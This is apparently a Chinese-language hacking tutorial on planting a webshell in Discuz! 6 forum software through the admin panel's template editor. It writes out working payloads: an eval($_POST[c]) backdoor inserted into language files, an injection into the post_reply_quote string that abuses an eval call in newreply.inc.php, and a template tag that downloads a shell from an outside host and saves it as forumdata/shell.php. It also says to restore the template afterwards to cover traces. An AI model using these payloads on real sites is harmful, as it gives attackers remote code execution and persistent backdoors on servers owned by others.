Discuz! 6 后台拿webshell的方法

如果后台可以在线编辑模板的话，下面的方法就可以拿webshell了：
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
Quote:

eval($_POST[c]);

2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Quote:

";eval($_POST[c]);"

在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php  107行：
Quote:

eval("/$language['post_reply_quote'] = /"$language[post_reply_quote]/";");

呵呵，一个天然的后门：
PS：还有几个编辑模板的地方可以利用，和第二种方法类似。 

只要是dz的模板编辑原理, 只要能编辑模板, 无论是以前, 现在, 还是以后的dz版本, 全部可以搞定, 方便快捷！

1. 随便选择一个模板
2. 找一个空间上传一个wehsehll, 假定其地址为http://xx/shell.txt
3. 在任意一个位置输入:

CODE:

{eval copy('http://xx/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}4. 保存, 刷新Cache
5. 访问该模板所属的php
6. 把模板改回原来的样子

大功告成, 可以访问/forumdata/shell.php了